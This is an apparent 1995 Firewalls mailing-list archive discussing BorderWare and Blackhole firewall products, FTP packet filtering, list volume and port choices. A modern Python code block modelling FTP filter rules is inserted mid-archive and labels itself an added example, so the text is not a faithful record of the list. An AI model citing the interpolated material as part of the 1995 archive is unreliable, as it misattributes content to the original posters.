The last time I saw it (the company was called Janus) it seemed to be a very robust system that worked nicely as a firewall. Then again, I am not sure I would run any services on the firewall anyway, so I can't comment on its alleged "limited" functionality. > It comes as software or with a correctly configured Pentium-based PC. > If I remember correctly (and there's little chance of that!), pricing is > $4000 for some number of internal users (100?), $7000 for more (500?), > and $11,000 for unlimited users. The prices quoted to me are: $11,000 for an unlimited license $ 7,000 to support 26-100 workstations on your LAN $ 4,000 for support up to 25 workstations. As a firewall, it looks a bit like the others. Some like the prices (it does seem "cheap" compared to others). The only problem is that some of my customers are not happy that it's a BSD-based system (and I am not sure I understand this mentality). If you're checking out BorderWare, I do suggest you check out the following (as comparisons): Gauntlet from Trusted Information Systems, http://www.tis.com Sidewinder from Secure Computing Corp., http://www.sctc.com Good luck. scott barman scott@disclosure.com STD DISCLAIMER: I speak for nobody but myself... and sometimes I can't even do that!! From firewalls-owner Mon May 15 09:04:05 1995 Received: (daemon@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id IAA08123 for firewalls-outgoing; Mon, 15 May 1995 08:09:21 -0700 Received: from box.eunet.be (box.eunet.be [192.92.130.2]) by miles.greatcircle.com (8.6.9/Miles-950430-1) with ESMTP id IAA08118 for ; Mon, 15 May 1995 08:09:17 -0700 Received: (from drachen@localhost) by box.eunet.be (8.6.9/8.6.9) id RAA11984; Mon, 15 May 1995 17:08:01 +0200 Date: Mon, 15 May 1995 17:07:59 +0200 (MET DST) From: Didier Racheneur X-Sender: drachen@box To: firewalls@greatcircle.com Subject: Volume !!! 
Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: firewalls-owner@GreatCircle.COM Precedence: bulk Hi ! There is so much volume on this list ! Almost 100K every day (and I only speak about firewalls-digest). It is almost impossible to do one's job and to read the list. Or is it only for the jobless ? Does anyone have a solution or an idea ? Didier From firewalls-owner Mon May 15 09:36:56 1995 Received: (daemon@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id HAA07886 for firewalls-outgoing; Mon, 15 May 1995 07:59:09 -0700 Received: from ingress.com (ingress.com [199.171.57.2]) by miles.greatcircle.com (8.6.9/Miles-950430-1) with SMTP id HAA07879 for ; Mon, 15 May 1995 07:59:05 -0700 Received: by ingress.com (4.1/SMI-4.1) id AA21454; Mon, 15 May 95 10:56:51 EDT Date: Mon, 15 May 95 10:56:51 EDT From: cbk@ingress.com (Charles Kaplan) Message-Id: <9505151456.AA21454@ingress.com> To: firewalls@greatcircle.com Subject: Re: BorderWare (previously "JANUS") Sender: firewalls-owner@GreatCircle.COM Precedence: bulk Subject: Re: BorderWare (previously "JANUS") [Originally sent to firewalls-owner@GreatCircle.Com by mistake on 10-May. Sorry...] > mention of a product previously known as "JANUS" but now called "BorderWare > FireWall Server." Does anyone have experience or input they care to share on > this product? > Thanks in advance! > > -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=- > "Printmaker gone digital" billcurr@cyberspace.com > http://www.cyberspace.com/billcurr > -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=- =====NOT A FLAME, but a few corrections. I have no experience with the product, but I'm here in Washington, DC, at the DECUS (Digital Equipment Computer Users Society) National Event, where BorderWare is exhibiting in the trade show. (If I understand correctly, Digital is now reselling Borderware as its low-priced entry firewall. S.E.A.L. continues as the advanced offering.)
Borderware seems to be a BSD O.S.-based combination packet filter/ circuit relay/application relay. The O.S. has been stripped to a minimum set of files. (I didn't pursue how they defined "minimum".) It is shipped closed, and it's claimed to have a relatively simple ("as a light switch"!) management interface to turn the supplied, frequently required services (FTP, mail, web, outbound finger, etc.). There is said to be no customization beyond that. (Use S.E.A.L.!) >>Correct. The Firewall Server is a Black Box, designed to be completely >> self maintaining. It combines both a firewall with your most common >> application servers (WWW, Anon FTP, DNS, finger, POP, News spool). It comes as software or with a correctly configured Pentium-based PC. If I remember correctly (and there's little chance of that!), pricing is $4000 for some number of internal users (100?), $7000 for more (500?), and $11,000 for unlimited users. >>A bit off the mark here. It comes as software, or pre-installed onto an >> appropriately configured PC (grin), within the limits of the SI's knowledge, >> as pulled from the site staff. >> List prices are $4000 for up to 25 screens >> $7000 for up to 100 screens >> $11000 for unlimited screens >> expect a high end pc, with lots of news disk to be on the order of $5000, >> and a few dollars to ensure it all works. >> TO CLARIFY NOW, a screen is a monitor. If your net has X-terms, or dumb >> terminals, if they can get telnet, they are a screen. (ABOUT) Security tokens are extra. They resell CRYPTOCard challenge-response tokens (like me) and Security Dynamics time-synchronization tokens. For SecurID, the ACE server runs on the box in the first release. In a later release you can use an existing ACE server on your internal net, thus having a single security database. >> Crypto Card runs as you say on the box, SecurID still isn't released. >> It has been announced as under development, and I among others look >> forward to seeing it later this summer.
Please verify the information above, as I've not checked it! Browse http://www.border.com/ for more information. I hope this will be of some initial help. >>Now verified >>Hope this helps out anyone interested in the product. Demos are available, >>along with many knowledgeable resellers. --- Charles B. Kaplan Vice President Ingress Communications, Inc. Enterprise Networking Ste 3406 Empire St Bld NY, NY 10118 cbk@ingress.com 45 Grant Avenue, Norwood, MA 02062 Networking / Internetworking / Security / Object Technology NT / UNIX / Novell From firewalls-owner Mon May 15 10:03:32 1995 Received: (daemon@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id IAA09163 for firewalls-outgoing; Mon, 15 May 1995 08:35:20 -0700 Received: from clark.net (clark.net [168.143.0.7]) by miles.greatcircle.com (8.6.9/Miles-950430-1) with ESMTP id IAA09158 for ; Mon, 15 May 1995 08:35:17 -0700 Received: (hcb@localhost) by clark.net (8.6.12/8.6.5) id LAA07555 for firewalls@greatcircle.com; Mon, 15 May 1995 11:35:02 -0400 From: Howard Berkowitz Message-Id: <199505151535.LAA07555@clark.net> Subject: FW-SNMP List Problem? To: firewalls@greatcircle.com Date: Mon, 15 May 1995 11:35:00 -0400 (EDT) X-Mailer: ELM [version 2.4 PL24alpha3] MIME-Version: 1.0 Content-Type: text/plain; charset=ISO-8859-1 Content-Transfer-Encoding: 8bit Content-Length: 193 Sender: firewalls-owner@GreatCircle.COM Precedence: bulk I've sent four contributions to the FW-SNMP list, but have not received anything back or any other postings. I did receive my majordomo subscription confirmation. Is anything wrong?
Howard From firewalls-owner Mon May 15 10:14:10 1995 Received: (daemon@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id IAA08940 for firewalls-outgoing; Mon, 15 May 1995 08:28:52 -0700 Received: from godzilla.PCC.COM ([204.249.8.3]) by miles.greatcircle.com (8.6.9/Miles-950430-1) with ESMTP id IAA08928 for ; Mon, 15 May 1995 08:28:47 -0700 Received: by godzilla.PCC.COM (Smail3.1.29.1 #3) id m0sB23s-0000JkC; Mon, 15 May 95 11:28 EDT Message-Id: From: jay@pcc.com (Jay Schuster) Subject: Packet Filtering, and FTP Customizations To: firewalls@GreatCircle.COM Date: Mon, 15 May 95 11:28:00 EDT X-Mailer: ELM [version 2.3 PL11] Sender: firewalls-owner@GreatCircle.COM Precedence: bulk I'm trying to use packet filtering on our Cisco 2501 router to implement some security. I'd like to allow FTP clients to access the outside world, but will run into the incoming connection problem described in the FAQ and the C&B Firewalls book. Both the FAQ and the C&B Firewalls book mention customizing the FTP client to use either a restricted port range or to use the PASV command to reverse the origination site of the data connection. Has anyone done this? Is there source code or patches available to do this anywhere? 
Thanks in advance, Jay -- Jay Schuster The People's Computer Company `Revolutionary Programming' From firewalls-owner Mon May 15 10:25:08 1995 Received: (daemon@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id IAA09184 for firewalls-outgoing; Mon, 15 May 1995 08:36:18 -0700 Received: from ALABAMA.CF.CS.YALE.EDU (RT-GW.CS.YALE.EDU [128.36.0.13]) by miles.greatcircle.com (8.6.9/Miles-950430-1) with SMTP id IAA09179 for ; Mon, 15 May 1995 08:36:14 -0700 Received: from SPARKY.CF.CS.YALE.EDU by ALABAMA.CF.CS.YALE.EDU via SMTP; Mon, 15 May 1995 11:35:48 -0400 Received: by SPARKY.CF.CS.YALE.EDU (Sendmail-5.67b/res.client.cf-3.7) id AA23789; Mon, 15 May 1995 11:35:46 -0400 Date: Mon, 15 May 1995 11:35:46 -0400 From: long-morrow@CS.YALE.EDU (H Morrow Long) Message-Id: <199505151535.AA23789@SPARKY.CF.CS.YALE.EDU> To: firewalls@greatcircle.com, steveg@cseic.saic.com Subject: Re: Firewall Web Page Sender: firewalls-owner@GreatCircle.COM Precedence: bulk >Could someone please send me the *current* URL for the "Firewall Products" >Web page maintained by a kind reader of this list? I believe the following is the latest URL (the document states that it was last updated 5-3-95): http://www.access.digex.net/~bdboyle/firewall.vendor.html The Firewalls Vendor FAQ is by Catherine Fulmer (mailto:cfulmer@pnc-pimc.com) and is made available on the Web by Brian Boyle. This is the disclaimer at the end of the document: DISCLAIMER: THIS INFORMATION COMES FROM SOURCES THAT CANNOT BE VERIFIED. AS SUCH, MAKE NO ASSUMPTIONS ABOUT ITS COMPLETENESS OR ACCURACY. I ENDEAVOR TO KEEP THIS LIST UP TO DATE AS MUCH AS POSSIBLE. FEEL FREE TO SEND COMMENTS/ UPDATES TO CATHERINE FULMER. DATE LAST UPDATE: 05-03-95.
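Jay Schuster's FTP question above is the classic packet-filter problem: in active mode the server opens the data connection back to the client, so the first packet of that connection is an inbound SYN, which a filter that only admits outbound-initiated traffic will drop. The following is an added example, not code from the list, the FAQ or the book, that models both data-connection styles against a small filter. The addresses, the filter model, the port range and the policy names are constructed for illustration; this is not Cisco access-list syntax, and it is not the FTP client patch being asked for.

```python
"""Why an active-mode FTP data connection collides with a packet filter,
and what PASV or a restricted PORT range changes.

Added example: the filter model, addresses and policies below are
constructed for illustration; this is not Cisco IOS access-list syntax
and not the FTP client patch the question asks about."""
from dataclasses import dataclass
from ipaddress import ip_address, ip_network

INTERNAL = ip_network("192.0.2.0/24")            # constructed: "our" network
CLIENT, SERVER = "192.0.2.10", "198.51.100.7"    # constructed hosts


@dataclass(frozen=True)
class Packet:
    direction: str   # "in" = arrives on the outside interface, "out" = leaves
    src: str
    sport: int
    dst: str
    dport: int
    syn_only: bool   # True for the first packet of a new TCP connection


def evaluate(rules, pkt):
    """First matching rule wins; anything unmatched is denied."""
    for action, match in rules:
        if match(pkt):
            return action == "permit"
    return False


def strict_policy():
    """Outbound from inside is fine; inbound only for packets that continue
    an existing connection (the idea behind the ACL 'established' keyword:
    no inbound SYN-only packets)."""
    return [
        ("permit", lambda p: p.direction == "out" and ip_address(p.src) in INTERNAL),
        ("permit", lambda p: p.direction == "in" and not p.syn_only),
    ]


def restricted_range_policy(lo=40000, hi=40099):
    """Strict policy plus the one hole a restricted-port-range FTP client
    needs: inbound new connections from source port 20 to that range."""
    return strict_policy() + [
        ("permit", lambda p: p.direction == "in" and p.syn_only
                   and p.sport == 20 and lo <= p.dport <= hi
                   and ip_address(p.dst) in INTERNAL),
    ]


def control_channel(rules):
    """FTP control connection: client -> server port 21, and the reply."""
    syn = Packet("out", CLIENT, 51233, SERVER, 21, True)
    reply = Packet("in", SERVER, 21, CLIENT, 51233, False)
    return evaluate(rules, syn) and evaluate(rules, reply)


def active_ftp_data(rules, client_port, server=SERVER):
    """Client sent PORT <client_port>; the server opens the data connection
    *to* the client from port 20, so the first packet is an inbound SYN."""
    return evaluate(rules, Packet("in", server, 20, CLIENT, client_port, True))


def passive_ftp_data(rules, server_port):
    """Client sent PASV and got a port back; the client opens the data
    connection outbound, which the strict policy already permits."""
    return evaluate(rules, Packet("out", CLIENT, 51234, SERVER, server_port, True))


if __name__ == "__main__":
    for name, rules in (("strict", strict_policy()),
                        ("restricted-range", restricted_range_policy())):
        print(f"{name:16} control={control_channel(rules)} "
              f"active(51235)={active_ftp_data(rules, 51235)} "
              f"active(40050)={active_ftp_data(rules, 40050)} "
              f"passive={passive_ftp_data(rules, 52000)}")
    # The cost of the hole: any outside host using source port 20 reaches
    # the advertised range, FTP server or not.
    print("outsider via port 20:",
          active_ftp_data(restricted_range_policy(), 40050, server="203.0.113.9"))
```

The last line shows the price of the restricted-range approach: the hole is keyed only on source port 20 and a destination port range, so it admits any outside host that chooses that source port. That is why the PASV route, where the data connection is initiated from inside like any other outbound session, needs no hole at all where the client supports it.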
--------------------------------------------------- From firewalls-owner Mon May 15 10:43:36 1995 Received: (daemon@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id IAA08585 for firewalls-outgoing; Mon, 15 May 1995 08:22:24 -0700 Received: from artemis.sto.fdata.se (artemis.sto.fdata.se [159.72.7.54]) by miles.greatcircle.com (8.6.9/Miles-950430-1) with ESMTP id IAA08560 for ; Mon, 15 May 1995 08:21:57 -0700 Received: (from tekantj@localhost) by artemis.sto.fdata.se (8.6.9/8.6.9) id PAA29282; Mon, 15 May 1995 15:19:27 GMT From: "Anders Tjader" Message-Id: <9505151719.ZM29278@artemis.sto.fdata.se> Date: Mon, 15 May 1995 17:19:23 +0200 In-Reply-To: steveg@cseic.saic.com (Stephen Harold Goldstein) "Firewall Web Page" (May 15, 14:04) References: <9505151429.AA22128@cseic.saic.com> Reply-To: anders.tjader@sto.fdata.se X-Mailer: Z-Mail (3.2.0 06sep94) To: steveg@cseic.saic.com (Stephen Harold Goldstein) Subject: Re: Firewall Web Page Cc: firewalls@GreatCircle.COM Mime-Version: 1.0 Content-Type: multipart/mixed; boundary="PART-BOUNDARY=.19505151719.ZM29278.sto.fdata.se" Sender: firewalls-owner@GreatCircle.COM Precedence: bulk --PART-BOUNDARY=.19505151719.ZM29278.sto.fdata.se Content-Description: Text Content-Type: text/plain ; charset=iso-8859-1 Content-Transfer-Encoding: quoted-printable X-Zm-Decoding-Hint: mimencode -q -u On May 15, 14:04, Stephen Harold Goldstein wrote: > Subject: Firewall Web Page > Could someone please send me the *current* URL for the "Firewall Products" > Web page maintained by a kind reader of this list? > > Stephen Goldstein steveg@cseic.saic.com > My first computer: A 24K Atari 800, Rev. A ROMS, November 1980 > Disclaimer: That's not what I said.
>-- End of excerpt from Stephen Harold Goldstein http://www.access.digex.net/~bdboyle/firewall.vendor.html -- ________________________________________________________________________ Anders Tjäder \_o_/ Voice: +46-8-7888791 WM-Data Försvarsdata AB | Fax: +46-8-6643380 S-10787 STOCKHOLM / \ Minicall: +46-746-447632 Internet: anders.tjader@sto.fdata.se X400: C=se; A={sil,400net}; P=wmdata; O=sto; S=tjader; G=anders MEMONET: WMDATA.SEWMSTO.ATJADER URL: http://w3.wmdata.se/webmaster.html _____________________100% Buzzword Compliant____________________________ --PART-BOUNDARY=.19505151719.ZM29278.sto.fdata.se-- From firewalls-owner Mon May 15 10:55:10 1995 Received: (daemon@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id JAA10886 for firewalls-outgoing; Mon, 15 May 1995 09:48:00 -0700 Received: from s.ecc.engr.uky.edu (s.ecc.engr.uky.edu [128.163.144.19]) by miles.greatcircle.com (8.6.9/Miles-950430-1) with ESMTP id JAA10881 for ; Mon, 15 May 1995 09:47:57 -0700 Received: (from morgan@localhost) by s.ecc.engr.uky.edu (8.6.10/8.6.10) id MAA07914 for firewalls@greatcircle.com; Mon, 15 May 1995 12:49:20 -0400 Date: Mon, 15 May 1995 12:49:20 -0400 From: Wes Morgan Message-Id: <199505151649.MAA07914@s.ecc.engr.uky.edu> To: firewalls@greatcircle.com Subject: Token-based security article Sender: firewalls-owner@GreatCircle.COM Precedence: bulk Data Communications, May 1995 Products reviewed: Multiguard - Communication Devices Inc SLC - Cryptocard Inc Defender 5000 - Digital Pathways Inc Traqnet 2008 - Leemah Datacom Security Corp MCR 4000 - Microframe Inc DL 1000 - Optimum Electronics Inc Access Gateway - Racal Guardata ACM/400 - Security Dynamics These products encompassed everything from Watchword calculators and SecurID to in-line hardware devices and floppy tokens. An interesting article...
--Wes ps> For those interested in back issues/subscriptions to Data Communications: 1-800-525-5003 or datacomm@mcgraw-hill.com From firewalls-owner Mon May 15 11:04:41 1995 Received: (daemon@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id JAA10327 for firewalls-outgoing; Mon, 15 May 1995 09:19:54 -0700 Received: from jupiter.man.net (jupiter.man.net [198.53.163.4]) by miles.greatcircle.com (8.6.9/Miles-950430-1) with ESMTP id JAA10317 for ; Mon, 15 May 1995 09:19:51 -0700 Received: by jupiter.man.net (8.6.10/1.37) id LAA22602; Mon, 15 May 1995 11:22:19 -0500 Message-Id: <199505151622.LAA22602@man.net> Subject: Blackhole product To: jamesl@interwork.com Date: Mon, 15 May 1995 11:22:18 -0500 (cdt) From: "Lionel Boiteau" Cc: firewalls@greatcircle.com X-Mailer: ELM [version 2.4 PL24] MIME-Version: 1.0 Content-Type: text/plain; charset=US-ASCII Content-Transfer-Encoding: 7bit Content-Length: 1046 Sender: firewalls-owner@GreatCircle.COM Precedence: bulk The Blackhole firewall from Milkyway Networks has full user level authentication which includes mosaic, gopher, FTP, telnet. It is currently the only firewall under evaluation with Communication Security Establishment (ie. Federal Government endorsed). It has the capability for a Virtual Private Network which allows secure data transfer between company networks. It has more features than other products, ie. monitors all ports, transparent proprietary application support, embedded IP address application support, etc. Info available from http://www.milkyway.com Milkyway is based in Ottawa, Canada. Blackhole is a Canadian product. Astra Network in Winnipeg is the authorized reseller of Blackhole in Manitoba. -- ______________________________________________________________ * Lionel Boiteau * * Astra Network, Inc.
* * Manitoba's First Commercial Internet Service provider * * (204) 987-7050 http://www.man.net/ * From firewalls-owner Mon May 15 11:26:00 1995 Received: (daemon@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id JAA10710 for firewalls-outgoing; Mon, 15 May 1995 09:41:05 -0700 Received: from tera.bctel.net (tera.bctel.net [204.174.66.253]) by miles.greatcircle.com (8.6.9/Miles-950430-1) with ESMTP id JAA10700 for ; Mon, 15 May 1995 09:41:00 -0700 Received: (from nobody@localhost) by tera.bctel.net (8.6.10/8.6.10) id JAA15193 for ; Mon, 15 May 1995 09:38:15 -0700 Received: from ilinx(192.197.176.225) by tera via smap (V1.3) id sma015191; Mon May 15 09:38:03 1995 Received: by ilinx.ilinx.com (/\==/\ Smail3.1.28.1 #28.1) id ; Mon, 15 May 95 09:40 PDT Message-Id: From: brian@ilinx.ilinx.com (Brian J. Murrell) To: jamesl@interwork.com Subject: Re: Milkyway's Black Hole product Cc: firewalls@greatcircle.com Date: Mon, 15 May 1995 09:40:17 -0700 (PDT) MIME-Version: 1.0 X-Mailer: Ishmail 1.0.5-386-950210 Available via anonymous ftp from ftp.halsoft.com Sender: firewalls-owner@GreatCircle.COM Precedence: bulk from the quill of James LaPalme on scroll > I am searching for information on Milkyway Network's Black Hole product. > > Information is welcome from end users, the manufacturer or channel > partners > (if any). The main question would be "Why Blackhole?". > Seriously, no sarcasm intended... As opposed to what?? Nothing, another product?? I think to get a realistic answer to "why Blackhole", you have to qualify what you want to compare it to. b. -- Brian J. Murrell brian@ilinx.com InterLinx Support Services, Inc. brian@wimsey.com North Vancouver, B.C. 
604 983 UNIX Platform and Brand Independent UNIX Support - R3.2 - R4 - BSD From firewalls-owner Mon May 15 11:44:42 1995 Received: (daemon@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id JAA10676 for firewalls-outgoing; Mon, 15 May 1995 09:40:30 -0700 Received: from oznet02.ozemail.com.au (oznet02.ozemail.com.au [203.2.192.124]) by miles.greatcircle.com (8.6.9/Miles-950430-1) with ESMTP id JAA10664 for ; Mon, 15 May 1995 09:39:49 -0700 Received: from shell01.ozemail.com.au (sstevens@shell01.ozemail.com.au [203.2.192.121]) by oznet02.ozemail.com.au (8.6.10/8.6.5) with ESMTP id CAA14572; Tue, 16 May 1995 02:39:29 +1000 Received: (sstevens@localhost) by shell01.ozemail.com.au (8.6.10/8.6.5) id CAA10180; Tue, 16 May 1995 02:39:28 +1000 From: Skeeve Stevens Message-Id: <199505151639.CAA10180@shell01.ozemail.com.au> Subject: Re: Volume !!! To: drachen@eunet.be (Didier Racheneur) Date: Tue, 16 May 1995 02:39:28 +1000 (EST) Cc: firewalls@GreatCircle.COM In-Reply-To: from "Didier Racheneur" at May 15, 95 05:07:59 pm X-Mailer: ELM [version 2.4 PL23] MIME-Version: 1.0 Content-Type: text/plain; charset=US-ASCII Content-Transfer-Encoding: 7bit Content-Length: 800 Sender: firewalls-owner@GreatCircle.COM Precedence: bulk > There is so much volume on this list ! Almost 100K every day > (and I only speak about firewalls-digest). It is almost impossible > to do one's job and to read the list. Or is it only for the jobless ? > Does anyone have a solution or an idea ? > Didier It's easy.. if the Subject line doesn't interest me, it gets deleted... and after a while you know authors, so I'll look out for the guys with something to say.
------------------------------------------------------------------ Skeeve Stevens Internet Consultant, WWW Developer & Freelance Internet Journalist Email: skeeve@ozemail.com.au Phone: (+612) 386-1424 skeeve@zip.com.au skeeve@suburbia.apana.org.au Home Page: http://www.ozemail.com.au/~sstevens http://www.zip.com.au/~skeeve #include From firewalls-owner Mon May 15 11:47:46 1995 Received: (daemon@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id KAA11211 for firewalls-outgoing; Mon, 15 May 1995 10:00:55 -0700 Received: from mailer.fsu.edu (mailer.fsu.edu [128.186.6.103]) by miles.greatcircle.com (8.6.9/Miles-950430-1) with SMTP id KAA11206 for ; Mon, 15 May 1995 10:00:50 -0700 Received: from pasco.UUCP by mailer.fsu.edu with UUCP id AA02936 (5.65c/IDA-1.4.4 for greatcircle.com!Firewalls); Mon, 15 May 1995 13:00:33 -0400 Date: Mon, 15 May 1995 12:48:47 -400 (EDT) From: Firewalls List subscriber account Reply-To: Firewalls List subscriber account Subject: Not very well-known ports To: Firewalls@greatcircle.com Message-Id: Mime-Version: 1.0 Content-Type: TEXT/PLAIN; CHARSET=US-ASCII Sender: firewalls-owner@GreatCircle.COM Precedence: bulk As I was browsing thru The Firewall Book over the weekend, I noticed that the authors stated, in at least two places, that they were using unusual port numbers to move data thru their firewall. Now I'm wondering, is this something to be recommended to those of us who are fairly new to fire-walling, and what are the advantages and disadvantages of it? What I can see in favor of this: First, not pushing mail through on port 25 might alleviate some probes from novices (like myself) such as 'telnet hostname 25' followed by the usual sendmail tactics; and using, say, port 402, for a bunch of other services--like telnet, gopher, etc--could simplify filter rules and access lists. Finally, this technique would mean that the user inside the firewall would have to know the corporate policy (i.e. 
you can only get out on port 402, etc.) Is this assessment correct? Are there other benefits of this approach that I am missing? --------------------------------------------------------------------------- Richard Fritz, Systems Analyst 813.929.2344(v) 2114(f) District School Board of Pasco County rfritz@pasco.k12.fl.us --------------------------------------------------------------------------- From firewalls-owner Mon May 15 11:50:54 1995 Received: (daemon@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id KAA12751 for firewalls-outgoing; Mon, 15 May 1995 10:57:36 -0700 Received: from interwork.com (daffy.interwork.com [198.73.138.240]) by miles.greatcircle.com (8.6.9/Miles-950430-1) with SMTP id KAA12746 for ; Mon, 15 May 1995 10:57:32 -0700 Received: from surf.interwork.com by interwork.com with SMTP (5.65/1.2-eef) id AA00533; Mon, 15 May 95 13:52:42 -0400 Message-Id: Priority: Normal To: Firewalls Discussion List Mime-Version: 1.0 From: James LaPalme Subject: Milkyway Con't Date: Mon, 15 May 95 14:01:13 EDT Content-Type: text/plain; charset=US-ASCII; X-MAPIextension=".TXT" Content-Transfer-Encoding: 7bit Sender: firewalls-owner@GreatCircle.COM Precedence: bulk My attempt at a brief message (to save everyone's time and energy) has led to some minor confusion. The question - "Why Blackhole?" - should have been expanded to read "Why pick (or not) Blackhole?" i.e. feature & benefits, personal experience, hands on comparative analysis, any technical advantage, etc.? Document form (for hard copy future reference) - electronic or otherwise is preferred. * James E. LaPalme Interwork Software 501-150 Laurier Ave.
West Ottawa, Ontario Canada K1P 5J4 Tel: (613) 238-8835 Fax: (613) 238-4453 800: (800) 461-8649 E-Mail: JamesL@Interwork.com * From firewalls-owner Mon May 15 12:28:55 1995 Received: (daemon@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id KAA12337 for firewalls-outgoing; Mon, 15 May 1995 10:47:38 -0700 Received: from maddie.atlantic.com (maddie.atlantic.com [198.252.200.3]) by miles.greatcircle.com (8.6.9/Miles-950430-1) with ESMTP id KAA12331 for ; Mon, 15 May 1995 10:47:32 -0700 Received: (pokey@localhost) by maddie.atlantic.com (8.6.10/8.6.9) id NAA04456; Mon, 15 May 1995 13:30:58 -0400 From: Rick Romkey Message-Id: <199505151730.NAA04456@maddie.atlantic.com> Subject: Re: BorderWare (previously "JANUS") To: scott@Disclosure.COM (Scott Barman) Date: Mon, 15 May 1995 13:30:57 -0400 (EDT) Cc: Stephen.L.Arnold@Arnold.Com, Firewalls@GreatCircle.COM In-Reply-To: from "Scott Barman" at May 15, 95 10:29:53 am X-Mailer: ELM [version 2.4 PL23] Content-Type: text Content-Length: 4071 Sender: firewalls-owner@GreatCircle.COM Precedence: bulk > > On Sun, 14 May 1995 Stephen.L.Arnold@Arnold.Com wrote: > > [Post about BorderWare deleted. I am not a sales droid for them, just > someone who is reviewing different products for a client and BorderWare > is one of them--in fact, it's on my "A" list] > > > Borderware seems to be a BSD O.S.-based combination packet filter/ > > circuit relay/application relay. The O.S. has been stripped to a > > minimum set of files. (I didn't pursue how they defined "minimum".) > > It's a stripped down version of BSD/OS from BSDI. I was told by their > sales droid that it is stripped down as far as they need it to be and > that nothing "extraneous" is left. Well it's more than just a stripped down version of BSDi. It truly has been "hardened". The BorderWare firewall shouldn't even be thought of as a UNIX box, since it is extremely black-box. 
The OS will not run non-BorderWare code, assuming someone somehow managed to upload it there in the first place. There are no logins on the box. > > > It is shipped closed, and it's claimed to have a relatively simple ("as > > a light switch"!) management interface to turn the supplied, frequently > > required services (FTP, mail, web, outbound finger, etc.). There is > > said to be no customization beyond that. (Use S.E.A.L.!) > > BorderWare, according to my information, can support all internet-based > services using a "simple" menu system. The system does not run X for > some very obvious reasons. The last time I saw it (the company was > called Janus) it seemed to be a very robust system that worked nicely as > a firewall. Then again, I am not sure I would run any services on the > firewall anyway, so I can't comment on its alleged "limited" > functionality. Well saying that it supports "all" Internet based services is stretching it a bit. It does, however, allow the administrator to set up both common and custom proxies. It does have some limited functionality as far as its Web server goes. It runs the original CERN httpd (once again, hardened) which has no support for CGI BIN (for obvious security reasons). We typically recommend any customer with this need to place a server on their public network and either disable the BorderWare WWW server or only use it for a limited sub-set of documents. As far as other servers go, they seem to work quite nicely...the FTP is simple enough and the USENET news and Mail seem to work wonderfully. > > It comes as software or with a correctly configured Pentium-based PC. > > If I remember correctly (and there's little chance of that!), pricing is > > $4000 for some number of internal users (100?), $7000 for more (500?), > > and $11,000 for unlimited users. > > The prices quoted to me are: > $11,000 for an unlimited license > $ 7,000 to support 26-100 workstations on your LAN > $ 4,000 for support up to 25 workstations.
> > As a firewall, it looks a bit like the others. Some like the prices (it > does seem "cheap" compared to others). The only problem is that some of > my customers are not happy that it's a BSD-based system (and I am not > sure I understand this mentality). These prices are the correct list prices. We have typically recommended loaded Pentium hardware (32 MB Ram, 2 GB disk, DAT, etc) for anyone who is considering running news. We recommend that customers have us at least burn-test everything first, although if you are comfortable with networking, fiddling with IRQ settings and the like, you can probably install and integrate it on your own. If anyone needs some help with discussing BorderWare or info on local resellers, call Border at (416) 368 7157 or send me e-mail and I'll try and hook you up with someone local. -Rick ---------------------------------------------------------------------------- Rick E Romkey | A T L A N T I C | Internet pokey@atlantic.com | Computing Technology Corporation | Specialists (203) 257-7163 | http://www.atlantic.com/ | ----------------------------------------------------------------------------- From firewalls-owner Mon May 15 12:27:55 1995 Received: (daemon@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id KAA12262 for firewalls-outgoing; Mon, 15 May 1995 10:45:02 -0700 Received: from ALABAMA.CF.CS.YALE.EDU (RT-GW.CS.YALE.EDU [128.36.0.13]) by miles.greatcircle.com (8.6.9/Miles-950430-1) with SMTP id KAA12248 for ; Mon, 15 May 1995 10:44:57 -0700 Received: from SPARKY.CF.CS.YALE.EDU by ALABAMA.CF.CS.YALE.EDU via SMTP; Mon, 15 May 1995 13:44:42 -0400 Received: by SPARKY.CF.CS.YALE.EDU (Sendmail-5.67b/res.client.cf-3.7) id AA24150; Mon, 15 May 1995 13:44:41 -0400 Date: Mon, 15 May 1995 13:44:41 -0400 From: long-morrow@CS.YALE.EDU (H Morrow Long) Message-Id: <199505151744.AA24150@SPARKY.CF.CS.YALE.EDU> To: drachen@eunet.be Subject: Re: Volume !!! 
Cc: firewalls@greatcircle.com Sender: firewalls-owner@GreatCircle.COM Precedence: bulk >From: Didier Racheneur > ... >There is so much volume on this list ! Almost 100K every day >(and I only speak about firewalls-digest). It is almost impossible >to do one's job and to read the list. Or is it only for the jobless ? >Does anyone have a solution or an idea ? 1. Hire someone to screen the list for you and summarize/paraphrase those items you are interested in and present them to you in a daily digest. This is the paid editor/consultant/assistant model. 2. Create an artificially intelligent mail screener program to do same. Many people are currently trying to do this with their e-mail and mailing lists flows - with differing degrees of success and fallibility. 3. Don't read the messages. Scan them visually superficially and just route them to a file (or delete them and rely on the Web archive site). Later 'grep' (search) through them when you need to find that message that you are sure was posted to Firewalls three months ago.... - Morrow From firewalls-owner Mon May 15 12:30:33 1995 Received: (daemon@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id MAA16106 for firewalls-outgoing; Mon, 15 May 1995 12:04:16 -0700 Received: from real.com (eagle.real.com [199.97.122.1]) by miles.greatcircle.com (8.6.9/Miles-950430-1) with ESMTP id MAA16101 for ; Mon, 15 May 1995 12:04:10 -0700 Date: Mon, 15 May 1995 15:03:01 -0400 From: bret@real.com (Bret McDanel) Received: by real.com (8.6.8.1/3.2.012693-Realistic Technologies Inc); id PAA02817 for 